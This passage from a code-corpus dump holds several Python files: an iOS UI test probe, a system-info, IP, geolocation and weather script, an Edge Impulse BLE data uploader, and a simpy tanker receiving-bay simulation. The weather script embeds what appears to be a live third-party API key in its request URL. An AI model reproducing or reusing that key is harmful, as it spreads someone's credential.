"call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.special.logsumexp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 274, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}]} +{"seq_id": "140062919", "text": "import asyncio\n\nfrom toga.fonts import CURSIVE, FANTASY, MONOSPACE, SANS_SERIF, SERIF, SYSTEM\nfrom toga_iOS.libs import NSRunLoop\n\n\nclass BaseProbe:\n def assert_font_family(self, expected):\n assert self.font.family == {\n CURSIVE: \"Apple Chancery\",\n FANTASY: \"Papyrus\",\n MONOSPACE: \"Courier New\",\n SANS_SERIF: \"Helvetica\",\n SERIF: \"Times New Roman\",\n SYSTEM: \".AppleSystemUIFont\",\n }.get(expected, expected)\n\n async def redraw(self, message=None, delay=None):\n \"\"\"Request a redraw of the app, waiting until that redraw has completed.\"\"\"\n # If we're running slow, wait for a second\n if self.app.run_slow:\n print(\"Waiting for redraw\" if message is None else message)\n delay = 1\n\n if delay:\n await asyncio.sleep(delay)\n else:\n # Running at \"normal\" speed, we need to release to the event loop\n # for at least one iteration. 
`runUntilDate:None` does this.\n NSRunLoop.currentRunLoop.runUntilDate(None)\n", "sub_path": "iOS/tests_backend/probe.py", "file_name": "probe.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "toga.fonts.CURSIVE", "line_number": 10, "usage_type": "name"}, {"api_name": "toga.fonts.FANTASY", "line_number": 11, "usage_type": "name"}, {"api_name": "toga.fonts.MONOSPACE", "line_number": 12, "usage_type": "name"}, {"api_name": "toga.fonts.SANS_SERIF", "line_number": 13, "usage_type": "name"}, {"api_name": "toga.fonts.SERIF", "line_number": 14, "usage_type": "name"}, {"api_name": "toga.fonts.SYSTEM", "line_number": 15, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "toga_iOS.libs.NSRunLoop.currentRunLoop.runUntilDate", "line_number": 30, "usage_type": "call"}, {"api_name": "toga_iOS.libs.NSRunLoop.currentRunLoop", "line_number": 30, "usage_type": "attribute"}, {"api_name": "toga_iOS.libs.NSRunLoop", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "2716278", "text": "import socket\nimport platform\nimport requests\nimport json\n\n\ndef get_IP():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('8.8.8.8', 0))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\ndef basic_information():\n\tInformacje = {\n\t\t\t\t\t\t\t'Distro' : platform.system(), \n\t\t\t\t\t\t\t'Release' : platform.release(), \n\t\t\t\t\t\t\t'Version' : platform.version(),\n\t\t\t\t\t\t\t'Processor' : platform.processor(),\n\t\t\t\t\t\t\t'Python version' : platform.python_version(),\n\t\t\t\t\t\t\t'Python build' : platform.python_build(),\n\t\t\t\t\t\t\t'Python implementation' : platform.python_implementation(),\n\t\t\t\t\t\t\t'Python compiler' : platform.python_compiler()\n\t\t\t\t\t\t\t}\n\tif Informacje['Processor'] == \"\":\n\t\tInformacje['Processor'] = \"Sorry, I can not determine version of your processor :( Maybe use other modules to do it.. 
\" \t\t\t\t\n\tfor element in Informacje:\n\t\tprint (element.upper(),\" : \", Informacje[element])\n\t\t\ndef geolocation():\n\turl = 'http://freegeoip.net/json/'\n\tr = requests.get(url)\n\tdata_js = r.json()\n\tfor e in data_js:\n\t\tprint (e, \" : \", data_js[e])\n\tweather(data_js[\"zip_code\"], data_js[\"country_code\"]) \n\ndef weather(zipcode, countrycode):\n\tnazwa = 'http://api.openweathermap.org/data/2.5/weather?zip=' + zipcode[:2] +zipcode[3:] + \",\" + countrycode.lower()+\"&apiid=b5542bcd7e1d8061ab5495b80fc23270\"\n\ta = requests.get(nazwa)\n\tpagoda = a.json()\n\tfor e in pagoda:\n\t\tprint (e, \" : \", pagoda[e])\n\ngeolocation()\t\nbasic_information()\nprint (\"\")\nprint (\"It is your local IP adress : \",get_IP())\n\n", "sub_path": "Python - IP, informations and weather.py", "file_name": "Python - IP, informations and weather.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 8, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 8, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 8, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 20, "usage_type": "call"}, {"api_name": "platform.release", "line_number": 21, "usage_type": "call"}, {"api_name": "platform.version", "line_number": 22, "usage_type": "call"}, {"api_name": "platform.processor", "line_number": 23, "usage_type": "call"}, {"api_name": "platform.python_version", "line_number": 24, "usage_type": "call"}, {"api_name": "platform.python_build", "line_number": 25, "usage_type": "call"}, {"api_name": "platform.python_implementation", "line_number": 26, "usage_type": "call"}, {"api_name": "platform.python_compiler", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 36, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "517024963", "text": "import json\nimport time, hmac, hashlib\nimport requests\nimport re, uuid\nimport math\nimport sys\nimport time\nimport binascii\nimport struct\nfrom bluepy import btle\nfrom bluepy.btle import UUID, Peripheral\n\n\n\nif len(sys.argv) != 4:\n\tprint(\"Fatal, must pass device address:\", sys.argv[0], \"\")\n\tquit()\naccelServiceUuid = \"2BEEF31A-B10D-271C-C9EA-35D865C1F48A\"\naccCharUuid = \"4664E7A1-5A13-BFFF-4636-7D0A4B16496C\"\nperipheralObject = btle.Peripheral(sys.argv[1])\n\n\n# Your API & HMAC keys can be found here (go to your project > Dashboard > Keys to find this)\nHMAC_KEY = \"Your HMAC Key\"\nAPI_KEY = \"Your API Key\"\n\n\nmySensor = btle.UUID(accelServiceUuid)\nsensorService = peripheralObject.getServiceByUUID(mySensor)\n\n\naccValue = sensorService.getCharacteristics(accCharUuid)[0]\n\n#print(cur_time,\"\\t\", acc_x,\"\\t\",acc_y,\"\\t\",acc_z,\"\\t\")\n\t\t\n\n\n# empty signature (all zeros). 
HS256 gives 32 byte signature, and we encode in hex, so we need 64 characters here\nemptySignature = ''.join(['0'] * 64)\n\n# device identifier reported to Edge Impulse\ndevice_name =\"Temp_BLe\"\nNAME=sys.argv[2]\nTIME=int(sys.argv[3])\n# interval between consecutive samples, in milliseconds\nINTERVAL_MS = 90\n\nif INTERVAL_MS <= 0:\n raise Exception(\"Interval in milliseconds cannot be equal or lower than 0.\")\n\n# here we'll collect TIME seconds of data at a frequency defined by interval_ms\nfreq =1000/INTERVAL_MS\nvalues_list=[]\nfor i in range (TIME*int(round(freq,0))):\n accVal=accValue.read()\n accV=[accVal[i:i+4] for i in range(0, len(accVal), 4)]\n acc_x=struct.unpack('f',accV[0])[0]\n acc_y=struct.unpack('f',accV[1])[0]\n acc_z=struct.unpack('f',accV[2])[0]\n values_list.append([acc_x*9.865,acc_y*9.865,acc_z*9.865])\n\ndata = {\n \"protected\": {\n \"ver\": \"v1\",\n \"alg\": \"HS256\",\n \"iat\": time.time() # epoch time, seconds since 1970\n },\n \"signature\": emptySignature,\n \"payload\": {\n \"device_name\": device_name,\n \"device_type\": \"BLE_TEST_DEVICE\",\n \"interval_ms\": INTERVAL_MS,\n \"sensors\": [\n { \"name\": \"accX\", \"units\": \"m/s2\" },\n { \"name\": \"accY\", \"units\": \"m/s2\" },\n { \"name\": \"accZ\", \"units\": \"m/s2\" }\n ],\n \"values\": values_list\n }\n}\n\n\n\n# encode in JSON\nencoded = json.dumps(data)\n\n# sign message\nsignature = hmac.new(bytes(HMAC_KEY, 'utf-8'), msg = encoded.encode('utf-8'), digestmod = hashlib.sha256).hexdigest()\n\n# set the signature again in the message, and encode again\ndata['signature'] = signature\nencoded = json.dumps(data)\n\n# and upload the file\nres = requests.post(url='https://ingestion.edgeimpulse.com/api/training/data',\n data=encoded,\n headers={\n 'Content-Type': 'application/json',\n 'x-file-name': NAME,\n 'x-api-key': API_KEY\n })\nif (res.status_code == 200):\n print('Uploaded file to Edge Impulse', res.status_code, res.content)\nelse:\n print('Failed to upload file to Edge Impulse', res.status_code, res.content)\n", "sub_path": "train_collect.py", "file_name": "train_collect.py", "file_ext": "py", "file_size_in_byte": 3041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "bluepy.btle.Peripheral", "line_number": 20, "usage_type": "call"}, {"api_name": "bluepy.btle", "line_number": 20, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bluepy.btle.UUID", "line_number": 28, "usage_type": "call"}, {"api_name": "bluepy.btle", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 57, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 58, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 59, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 88, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 95, "usage_type": "call"}]}
{"seq_id": 
"118377716", "text": "from __future__ import division\nimport random\nimport simpy\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport pandas as pd\nimport datetime\n\nfrom Systems.recvBay import RecvBays\nfrom Systems.plant import Plants\nfrom Agents.truck import Truck\nfrom Utilities.recvsilos import RecvSilos\nfrom Animation.animation import Animation\nimport sys\n\nRANDOM_SEED = 24\nFIXED_WASH_TIME = 10\nFIXED_SCALE_TIME = 5\nSIM_TIME = 60*60\nHUMAN_RECEIVER_OPERATION_TIME = 5\nUNLOAD_FLOW_RATE = 1000 # lbs/minute\nNUM_HUMAN_RECEIVERS = 1\nNUM_SCALES = 1\nMAX_REASONABLE_WAIT_TO_UNLOAD = 40\nPERCENTAGE_UNLOAD_TANDEM_ARRIVALS = 50\nPERCENTAGE_LOADOUT_ARRIVALS = 20\nPERCENTAGE_LOADOUT_TANDEM_ARRIVALS = 90\nPERCENTAGE_UNLOAD_REQUIRE_WASH = 100\nPERCENTAGE_LOADOUT_REQUIRE_WASH = 100\n\nRUN_ANIMATION = False\n\n\nclass Simulation(object):\n def __init__(self, name, num_scales, num_human_receivers, fixed_wash_time,\n scale_time, max_sim_time, human_receiver_operation_time, run_realtime=False):\n if run_realtime is True:\n self.env = simpy.rt.RealtimeEnvironment(initial_time=0, factor=0.05,\n strict=False)\n else:\n self.env = simpy.Environment()\n self.env.process(self.setup_simulation(name, num_scales, num_human_receivers,\n fixed_wash_time, scale_time,\n human_receiver_operation_time,\n max_sim_time))\n\n self.BaySystem = None\n self.SiloSystem = None\n self.PlantSystem = None\n\n # assuming empty system at the beginning of simulation\n self.system_truck_count = {'x': [0], 'y': [0]}\n self.count = {'tankers_in_system': {'time': [0], 'count': [0], 'color': 'blue', 'linestyle': '-',\n 'location': (0, 0)},\n 'tankers_waiting_for_scale': {'time': [0], 'count': [0], 'color': 'orange','linestyle': '-',\n 'location': (1, 0)},\n 'tankers_waiting_for_bay': {'time': [0], 'count': [0], 'color': 'teal', 'linestyle': '-',\n 'location': (2, 0)},\n 'tankers_in_bays': {'time': [0], 'count': [0], 'color': 'blue', 'linestyle': '-',\n 'location': (0, 1)},\n 'tankers_waiting_for_unload': {'time': [0], 'count': [0], 'color': 'tan', 'linestyle': '-',\n 'location': (3, 0)},\n 'tankers_waiting_for_wash': {'time': [0], 'count': [0], 'color': 'olive', 'linestyle': '-',\n 'location': None},\n 'tankers_waiting_for_loadout': {'time': [0], 'count': [0], 'color': 'wheat', 'linestyle': '-',\n 'location': (5, 0)}}\n\n self.KPIs = {'tankers_entered_scale_count': 0, 'avg_wait_to_scale': 0,\n 'tankers_entered_unload_bay_count': 0, 'avg_wait_to_unload': 0,\n 'tankers_entered_CIP_bay_count': 0, 'avg_wait_to_CIP': 0,\n 'tankers_requested_CIP_unit_count': 0, 'avg_wait_for_CIP_unit': 0,\n 'tankers_entered_loadout_bay_count': 0, 'avg_wait_to_loadout': 0,\n 'receiver_requests_count': 0, 'avg_wait_for_receiver': 0,\n 'tankers_scaled_count': 0, 'avg_scale_time': 0,\n 'tankers_unloaded_count': 0, 'avg_unload_time': 0,\n 'tankers_washed_count': 0, 'avg_wash_time': 0,\n 'tankers_loadedout_count': 0, 'avg_loadout_time': 0,\n 'receiver_procedures_count': 0, 'avg_receiver_time': 0,\n 'tankers_left': 0, 'avg_throughput_time': 0}\n\n self.KPIs_over_time = {'avg_wait_to_scale': {'time': [0], 'val': [0], 'color': 'orange', 'location': (1, 1)},\n 'avg_scale_time': {'time': [0], 'val': [0], 'color': 'orange', 'location': (1, 2)},\n 'avg_wait_to_unload': {'time': [0], 'val': [0], 'color': 'tan', 'location': (3, 1)},\n 'avg_unload_time': {'time': [0], 'val': [0], 'color': 'tan', 'location': (3, 2)},\n 'avg_wait_to_CIP': {'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 0)},\n 'avg_wait_for_CIP_unit': 
{'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 1)},\n 'avg_wash_time': {'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 2)},\n 'avg_wait_to_loadout': {'time': [0], 'val': [0], 'color': 'wheat', 'location': (5, 1)},\n 'avg_loadout_time': {'time': [0], 'val': [0], 'color': 'wheat', 'location': (5, 2)},\n 'avg_wait_for_receiver': {'time': [0], 'val': [0], 'color': 'salmon', 'location':(2, 1)},\n 'avg_receiver_time': {'time': [0], 'val': [0], 'color': 'salmon', 'location': (2, 2)},\n 'avg_throughput_time': {'time': [0], 'val': [0], 'color': 'blue', 'location': (0, 2)}}\n\n # will be setup in 'setup_simulation'\n self.fig_performance, self.axes_performance, self.line_data_performance, self.annotation_performance = \\\n None, None, None, None\n self.fig_silo_levels, self.axes_silo_levels, self.silo_axis_dict, self.line_data_silo_levels = \\\n None, None, None, None\n\n def setup_simulation(self, name, num_scales, num_human_receivers, fixed_wash_time,\n scale_time, human_receiver_operation_time, max_sim_time):\n\n \"\"\"LOAD SYSTEM DATA WORKBOOK\"\"\"\n data_workbook = pd.ExcelFile(\"System Data.xlsx\")\n df_bays = pd.read_excel(data_workbook, 'Bays')\n bay_dict = df_bays.set_index(['Bay Name']).T.to_dict()\n\n df_cip_units = pd.read_excel(data_workbook, 'CIP Units')\n cip_units_dict = {unit_ID: {'bays': list(df_cip_units[df_cip_units['CIP Unit ID'] ==\n unit_ID]['Bay Name'].unique()),\n 'simultaneous_services': max(list(df_cip_units[df_cip_units['CIP Unit ID'] ==\n unit_ID]\n ['Max Simultaneous Services'].unique()))}\n for unit_ID in list(df_cip_units['CIP Unit ID'].unique())}\n\n \"\"\"SETUP BAY SYSTEM BASED ON DATA\"\"\"\n self.BaySystem = RecvBays(self.env, name, bay_dict, cip_units_dict, num_scales, num_human_receivers,\n fixed_wash_time, scale_time, human_receiver_operation_time, self.print_event)\n\n # Setup silos. 
Each creates simpy container object\n df_silos = pd.read_excel(data_workbook, 'Silos')\n df_silos.rename(columns={'Silo Capacity': 'capacity', 'Silo Initial Level': 'init_level',\n 'Silo Inlet Flow Rate': 'inlet_flow_rate', 'Silo Type': 'silo_type',\n 'Silo Outlet Flow Rate': 'outlet_flow_rate'}, inplace=True)\n silo_dict = df_silos.set_index('Silo Name').T.to_dict()\n\n df_bus_inlets = pd.read_excel(data_workbook, 'Bus Inlets')\n for silo in list(df_bus_inlets['Silo Name'].unique()):\n silo_dict[silo]['bays'] = dict(df_bus_inlets[df_bus_inlets['Silo Name'] ==\n silo][['Bay Name', 'Inlet Flow Rate']].values)\n\n \"\"\"SETUP SILO SYSTEM\"\"\"\n self.SiloSystem = RecvSilos(name, self.env, silo_dict,\n {bay_id: {i: bay_dict[bay_id]['Rate - Pump' + str(i)] for i in range(1, 3)\n if bay_dict[bay_id]['Rate - Pump' + str(i)] > 0}\n for bay_id in bay_dict.keys()},\n self.print_event, self.plot_silo_level)\n\n df_plants = pd.read_excel(data_workbook, 'Plants')\n df_plants.rename(columns={'Plant Intake Fluid Rate': 'intake_rate'}, inplace=True)\n plant_dict = df_plants[['Plant Name', 'intake_rate']].set_index('Plant Name').T.to_dict()\n\n \"\"\"SETUP PLANTS\"\"\"\n self.PlantSystem = Plants(self.env, plant_dict, self.SiloSystem, self.print_event)\n\n # Produce trucks until the end of simulation\n truck_id = 0\n truck_objects_list = []\n\n self.fig_silo_levels, self.axes_silo_levels, self.silo_axis_dict, self.line_data_silo_levels = \\\n self.setup_silo_plots(self.SiloSystem)\n self.fig_performance, self.axes_performance, self.line_data_performance, self.annotation_performance = self.setup_count_plot()\n\n self.plot_silo_level(self.SiloSystem.silos.keys())\n\n while True and self.env.now <= max_sim_time:\n\n self.env.process(self.PlantSystem.run_plants(self.SiloSystem))\n\n \"\"\"Wait until the next tanker arrive\"\"\"\n yield self.env.timeout(self.time_until_next_arrival())\n\n # Truck arrived, update the system truck count\n self.update_count('tankers_in_system', delta=1)\n truck_id += 1\n\n # Create a truck object with load pounds,\n # also pass in our System object(s)\n truck = Truck(truck_id, self.generate_load_config(), self.BaySystem, self.env,\n MAX_REASONABLE_WAIT_TO_UNLOAD, self.print_event)\n truck_objects_list.append(truck)\n self.print_event(time=self.env.now, agent=\"Truck \"+str(truck.name),\n event=\"Arrived for {}\".format(truck.type), fluid_lbs=truck.load_pounds)\n\n '''Start the process to unload the truck'''\n # sequentially request different silos for unload\n self.env.process(truck.request_processing(self.SiloSystem, self))\n plt.pause(0.01)\n # plt.legend()\n\n def update_kpi(self, new_value, kpi=None):\n \"\"\"\n Method when called with proper KPI will update it and call for update in plot\n \"\"\"\n\n if kpi in self.KPIs.keys():\n\n if kpi == 'avg_wait_to_scale':\n self.KPIs['avg_wait_to_scale'] = \\\n (self.KPIs['avg_wait_to_scale']*self.KPIs['tankers_entered_scale_count'] +\n new_value)/(self.KPIs['tankers_entered_scale_count'] + 1)\n self.KPIs['tankers_entered_scale_count'] += 1\n\n if kpi == 'avg_wait_to_unload':\n self.KPIs['avg_wait_to_unload'] = \\\n (self.KPIs['avg_wait_to_unload']*self.KPIs['tankers_entered_unload_bay_count'] +\n new_value)/(self.KPIs['tankers_entered_unload_bay_count'] + 1)\n self.KPIs['tankers_entered_unload_bay_count'] += 1\n\n if kpi == 'avg_wait_to_CIP':\n self.KPIs['avg_wait_to_CIP'] = \\\n (self.KPIs['avg_wait_to_CIP'] * self.KPIs['tankers_entered_CIP_bay_count'] +\n new_value) / (self.KPIs['tankers_entered_CIP_bay_count'] + 1)\n 
self.KPIs['tankers_entered_CIP_bay_count'] += 1\n\n if kpi == 'avg_wait_for_CIP_unit':\n self.KPIs['avg_wait_for_CIP_unit'] = \\\n (self.KPIs['avg_wait_for_CIP_unit'] * self.KPIs['tankers_requested_CIP_unit_count'] +\n new_value) / (self.KPIs['tankers_requested_CIP_unit_count'] + 1)\n self.KPIs['tankers_requested_CIP_unit_count'] += 1\n\n if kpi == 'avg_wait_to_loadout':\n self.KPIs['avg_wait_to_loadout'] = \\\n (self.KPIs['avg_wait_to_loadout'] * self.KPIs['tankers_entered_loadout_bay_count'] +\n new_value) / (self.KPIs['tankers_entered_loadout_bay_count'] + 1)\n self.KPIs['tankers_entered_loadout_bay_count'] += 1\n\n if kpi == 'avg_wait_for_receiver':\n self.KPIs['avg_wait_for_receiver'] = \\\n (self.KPIs['avg_wait_for_receiver'] * self.KPIs['receiver_requests_count'] +\n new_value) / (self.KPIs['receiver_requests_count'] + 1)\n self.KPIs['receiver_requests_count'] += 1\n\n if kpi == 'avg_scale_time':\n self.KPIs['avg_scale_time'] = \\\n (self.KPIs['avg_scale_time'] * self.KPIs['tankers_scaled_count'] +\n new_value) / (self.KPIs['tankers_scaled_count'] + 1)\n self.KPIs['tankers_scaled_count'] += 1\n\n if kpi == 'avg_unload_time':\n self.KPIs['avg_unload_time'] = \\\n (self.KPIs['avg_unload_time'] * self.KPIs['tankers_unloaded_count'] +\n new_value) / (self.KPIs['tankers_unloaded_count'] + 1)\n self.KPIs['tankers_unloaded_count'] += 1\n\n if kpi == 'avg_wash_time':\n self.KPIs['avg_wash_time'] = \\\n (self.KPIs['avg_wash_time'] * self.KPIs['tankers_washed_count'] +\n new_value) / (self.KPIs['tankers_washed_count'] + 1)\n self.KPIs['tankers_washed_count'] += 1\n\n if kpi == 'avg_loadout_time':\n self.KPIs['avg_loadout_time'] = \\\n (self.KPIs['avg_loadout_time'] * self.KPIs['tankers_loadedout_count'] +\n new_value) / (self.KPIs['tankers_loadedout_count'] + 1)\n self.KPIs['tankers_loadedout_count'] += 1\n\n if kpi == 'avg_receiver_time':\n self.KPIs['avg_receiver_time'] = \\\n (self.KPIs['avg_receiver_time'] * self.KPIs['receiver_procedures_count'] +\n new_value) / (self.KPIs['receiver_procedures_count'] + 1)\n self.KPIs['receiver_procedures_count'] += 1\n\n if kpi == 'avg_throughput_time':\n self.KPIs['avg_throughput_time'] = \\\n (self.KPIs['avg_throughput_time'] * self.KPIs['tankers_left'] +\n new_value) / (self.KPIs['tankers_left'] + 1)\n self.KPIs['tankers_left'] += 1\n\n self.update_kpi_over_time(kpi)\n\n def update_kpi_over_time(self, kpi):\n if kpi in self.KPIs_over_time.keys():\n self.KPIs_over_time[kpi]['time'].append(self.env.now)\n self.KPIs_over_time[kpi]['val'].append(self.KPIs[kpi])\n subplot_loc = self.KPIs_over_time[kpi]['location']\n # self.axes_count[self.KPIs_over_time[kpi]['location']].plot(self.KPIs_over_time[kpi]['time'],\n # self.KPIs_over_time[kpi]['val'],\n # color=self.KPIs_over_time[kpi]['color'])\n self.line_data_performance[subplot_loc].set_xdata(self.KPIs_over_time[kpi]['time'])\n self.line_data_performance[subplot_loc].set_ydata(self.KPIs_over_time[kpi]['val'])\n self.axes_performance[subplot_loc].set_ylim(0, max(self.KPIs_over_time[kpi]['val']) + 20)\n self.axes_performance[subplot_loc].set_yticks(\n range(0, int(max(self.KPIs_over_time[kpi]['val'])) + 20,\n max(int(max(self.KPIs_over_time[kpi]['val'])/5), 5)))\n if self.annotation_performance[subplot_loc] is not None:\n self.annotation_performance[subplot_loc].remove()\n self.annotation_performance[subplot_loc] = \\\n self.axes_performance[subplot_loc].annotate(\"{:.1f}\".format(self.KPIs[kpi]),\n (self.env.now, self.KPIs[kpi]))\n\n def run(self, sim_time):\n \"\"\"Start simulation with specified end 
time\"\"\"\n self.env.run(until=sim_time)\n\n def setup_count_plot(self):\n figure, axes = plt.subplots(6, 3)\n figure.tight_layout()\n line_data = {}\n annotation = {(i, j): None for i in range(6) for j in range(3)}\n\n for param in self.count.keys():\n subplot_loc = self.count[param]['location']\n if subplot_loc is not None: #things not to be plotted\n line_data[subplot_loc], = \\\n axes[subplot_loc].step(self.count[param]['time'], self.count[param]['count'],\n where='post', color=self.count[param]['color'],\n linestyle=self.count[param]['linestyle'])\n title = param.replace('_', ' ').upper()\n axes[subplot_loc].set_title(title)\n axes[subplot_loc].set_xlim(0, SIM_TIME)\n # axes[subplot_loc].grid(b=True, which='both')\n\n for KPI in self.KPIs_over_time.keys():\n subplot_loc = self.KPIs_over_time[KPI]['location']\n if subplot_loc is not None:\n line_data[subplot_loc], = \\\n axes[subplot_loc].plot(self.KPIs_over_time[KPI]['time'],\n self.KPIs_over_time[KPI]['val'],\n color=self.KPIs_over_time[KPI]['color'])\n title = KPI.replace('_', ' ').upper()\n axes[subplot_loc].set_title(title)\n axes[subplot_loc].set_xlim(0, SIM_TIME)\n # axes[subplot_loc].grid(b=True, which='both')\n\n return figure, axes, line_data, annotation\n\n def update_count(self, param, delta=0):\n if param in self.count.keys():\n self.count[param]['time'].append(self.env.now)\n self.count[param]['count'].append(self.count[param]['count'][-1] + delta)\n\n self.line_data_performance[self.count[param]['location']].set_xdata(self.count[param]['time'])\n self.line_data_performance[self.count[param]['location']].set_ydata(self.count[param]['count'])\n self.axes_performance[self.count[param]['location']].set_ylim(0, max(self.count[param]['count']) + 1)\n self.axes_performance[self.count[param]['location']].set_yticks(range(0,\n max(self.count[param]['count']) + 1))\n\n @staticmethod\n def setup_silo_plots(silo_system):\n fig, axes = plt.subplots(int(len(silo_system.silos.keys())/2), 2)\n fig.tight_layout()\n row_count, col_count = 0, 0\n silo_axis_dict = {}\n line_data = {}\n for silo in silo_system.silos.keys():\n line_data[(row_count, col_count)], = axes[row_count, col_count].plot(\n silo_system.level_timestamps[silo]['x'], silo_system.level_timestamps[silo]['y'], color='r')\n axes[row_count, col_count].set_title(silo)\n silo_axis_dict[silo] = (row_count, col_count)\n axes[row_count, col_count].set_ylim(0, silo_system.silos[silo].capacity)\n axes[row_count, col_count].set_xlim(0, SIM_TIME)\n axes[row_count, col_count].grid(b=True, which='both')\n\n if col_count == 1:\n col_count = 0\n row_count += 1\n else:\n col_count += 1\n return fig, axes, silo_axis_dict, line_data\n\n def plot_silo_level(self, silos):\n for silo in silos:\n self.line_data_silo_levels[self.silo_axis_dict[silo]].set_xdata(self.SiloSystem.level_timestamps[silo]['x'])\n self.line_data_silo_levels[self.silo_axis_dict[silo]].set_ydata(self.SiloSystem.level_timestamps[silo]['y'])\n\n @staticmethod\n def time_until_next_arrival():\n return random.randint(1, 60)\n\n @staticmethod\n def generate_load_config():\n '''MOVE THIS TO CLASS VARIABLE AFTER TESTING. 
UNNECESSARY TO GENERATE AT EVERY CALL'''\n choices_loadout_unload = PERCENTAGE_LOADOUT_ARRIVALS*['loadout'] + \\\n (100-PERCENTAGE_LOADOUT_ARRIVALS)*['unload']\n random.shuffle(choices_loadout_unload)\n choices_unload_tandems = PERCENTAGE_UNLOAD_TANDEM_ARRIVALS*['tandem'] + \\\n (100-PERCENTAGE_UNLOAD_TANDEM_ARRIVALS)*['single']\n choices_loadout_tandems = PERCENTAGE_LOADOUT_TANDEM_ARRIVALS * ['tandem'] + \\\n (100 - PERCENTAGE_LOADOUT_TANDEM_ARRIVALS) * ['single']\n choices_unload_wash = PERCENTAGE_UNLOAD_REQUIRE_WASH*[True] + \\\n (100-PERCENTAGE_UNLOAD_REQUIRE_WASH)*[False]\n choices_loadout_wash = PERCENTAGE_LOADOUT_REQUIRE_WASH * [True] + \\\n (100 - PERCENTAGE_LOADOUT_REQUIRE_WASH) * [False]\n random.shuffle(choices_unload_tandems)\n random.shuffle(choices_loadout_tandems)\n random.shuffle(choices_unload_wash)\n random.shuffle(choices_loadout_wash)\n\n if random.choice(choices_loadout_unload) == 'unload':\n if random.choice(choices_unload_tandems) == 'tandem':\n return {'type': 'unload',\n 'is_tandem': True,\n 'require_wash': random.choice(choices_unload_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': random.randint(65, 85)}\n else:\n return {'type': 'unload',\n 'is_tandem': False,\n 'require_wash': random.choice(choices_unload_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': 100}\n else:\n \"\"\"in case of loadouts, load_pounds are ideal requested pounds of loadout fluid\"\"\"\n if random.choice(choices_loadout_tandems) == 'tandem':\n return {'type': 'loadout',\n 'is_tandem': True,\n 'require_wash': random.choice(choices_loadout_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': random.randint(65, 85)}\n else:\n return {'type': 'loadout',\n 'is_tandem': False,\n 'require_wash': random.choice(choices_loadout_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': 100}\n\n @staticmethod\n def print_event(time=\"-\", system=\"-\", agent=\"-\", event=\"-\", utility=\"-\", fluid_lbs=\"-\", etc=\"-\"):\n print(\"%-8s%-12s%-12s%-35s%-12s%-13s%-15s\" % (str(time), str(system), str(agent),\n str(event), str(utility), str(fluid_lbs), str(etc)))\n\n\nclass Logger(object):\n def __init__(self):\n self.terminal = sys.stdout\n self.log = open('sim_log/output.log', 'a')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n # for python 3 capability\n pass\n\n\nif __name__ == '__main__':\n sys.stdout = Logger()\n print(\"Receiving Bay - Simulation started at \" +\n \"{}\".format(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')))\n random.seed(RANDOM_SEED)\n start = time.clock()\n\n my_sim = Simulation('Sunnyside', NUM_SCALES, NUM_HUMAN_RECEIVERS, FIXED_WASH_TIME, FIXED_SCALE_TIME,\n SIM_TIME, HUMAN_RECEIVER_OPERATION_TIME, run_realtime=False)\n print('Time taken to setup simulation = {}'.format(time.clock()-start))\n print(\"\\n\")\n my_sim.print_event(\"TIME\", \"SYSTEM\", \"AGENT\", \"EVENT\", \"UTILITY\", \"FLUID LBS\", \"ET_COMPLETION\")\n my_sim.print_event(8 * \"-\", 12 * \"-\", 12 * \"-\", 35 * \"-\", 12 * \"-\", 13 * \"-\", 